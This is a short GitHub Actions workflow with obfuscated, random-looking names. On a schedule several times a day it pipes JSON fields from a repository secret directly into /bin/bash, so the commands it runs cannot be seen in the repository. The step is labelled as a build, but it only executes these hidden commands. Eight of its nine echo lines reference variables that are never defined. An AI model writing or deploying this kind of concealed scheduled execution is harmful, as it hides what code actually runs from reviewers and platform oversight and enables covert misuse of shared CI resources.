name: huanlxh
on:
  workflow_dispatch:
  schedule:
    - cron: '53 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huanlxh
        env:
          dsxv4: ${{ secrets.dsxv4 }}
        run: |
          echo $dsxv4 | jq -r .o542 | /bin/bash
          echo $xy211 | jq -r .gcu333 | /bin/bash
          echo $qb610 | jq -r .v93804 | /bin/bash
          echo $i5 | jq -r .leij8 | /bin/bash
          echo $we85 | jq -r .t278 | /bin/bash
          echo $dilon083 | jq -r .s464 | /bin/bash
          echo $vfg4 | jq -r .ox29033 | /bin/bash
          echo $hutsh504 | jq -r .q1 | /bin/bash
          echo $vbza29242 | jq -r .kv725 | /bin/bash

